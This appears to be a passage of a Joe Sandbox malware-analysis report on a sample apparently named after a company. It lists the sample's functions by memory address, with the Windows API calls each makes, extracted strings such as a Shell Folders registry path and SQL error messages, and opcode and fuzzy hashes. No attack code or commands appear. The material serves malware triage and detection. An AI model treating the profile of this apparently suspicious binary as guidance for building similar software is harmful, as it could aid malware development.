                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                    • memset.MSVCRT ref: 00405ABB
                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4281309102-0
                                                                                                    • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                    • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfwcscat
                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                    • API String ID: 384018552-4153097237
                                                                                                    • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                    • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                    • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                    • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                    APIs
                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                    • String ID: 6$\
                                                                                                    • API String ID: 404372293-1284684873
                                                                                                    • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                    • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1331804452-0
                                                                                                    • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                    • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                    • String ID: advapi32.dll
                                                                                                    • API String ID: 2012295524-4050573280
                                                                                                    • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                    • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                                                                    • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                                                                    • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                    • <%s>, xrefs: 004100A6
                                                                                                    • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_snwprintf
                                                                                                    • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                    • API String ID: 3473751417-2880344631
                                                                                                    • Opcode ID: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                    • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                    • Opcode Fuzzy Hash: 2b06e63593618d13b5a5b8efcda018c795261ff0c1630acf280f9998f6f819b8
                                                                                                    • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: wcscat$_snwprintfmemset
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 2521778956-791839006
                                                                                                    • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                    • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                    • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                                                                                    • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfwcscpy
                                                                                                    • String ID: dialog_%d$general$menu_%d$strings
                                                                                                    • API String ID: 999028693-502967061
                                                                                                    • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                    • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                    • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                                                                                    • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                    APIs
                                                                                                    • strlen.MSVCRT ref: 00408DFA
                                                                                                      • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                                                                    • memset.MSVCRT ref: 00408E46
                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                                                                    • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                                                                    • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memsetstrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 2350177629-0
                                                                                                    • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                    • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                                                                                    • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                                                                                    • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset
                                                                                                    • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                    • API String ID: 2221118986-1606337402
                                                                                                    • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                    • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                                                                                    • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                                                                                    • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                                                                                    APIs
                                                                                                    • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                                                                    • memset.MSVCRT ref: 00408FD4
                                                                                                    • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                                                                    • memset.MSVCRT ref: 00409042
                                                                                                    • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                                                                      • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 265355444-0
                                                                                                    • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                    • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                                                                                    • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                                                                                    • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                      • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                      • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                    • memset.MSVCRT ref: 0040C439
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                    • _wcsupr.MSVCRT ref: 0040C481
                                                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                    • memset.MSVCRT ref: 0040C4D0
                                                                                                    • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4131475296-0
                                                                                                    • Opcode ID: fcedaf62f28e4fa43429b70223f92c2d9bddde4a2c2a0188f501f40e4b32f332
                                                                                                    • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                    • Opcode Fuzzy Hash: fcedaf62f28e4fa43429b70223f92c2d9bddde4a2c2a0188f501f40e4b32f332
                                                                                                    • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004116FF
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                      • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                      • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                      • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                      • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                      • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                      • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                      • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                      • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                      • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                      • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                    • API String ID: 2618321458-3614832568
                                                                                                    • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                    • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                    • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                    • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AttributesFilefreememset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2507021081-0
                                                                                                    • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                    • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                    • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                                                                    • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                    APIs
                                                                                                    • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                    • malloc.MSVCRT ref: 00417524
                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                    • free.MSVCRT ref: 00417544
                                                                                                    • free.MSVCRT ref: 00417562
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000C.00000002.2691024481.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000C.00000002.2691024481.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_12_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                    • String ID:
                                                                                                    • API String ID: 4131324427-0
                                                                                                    • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                    • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
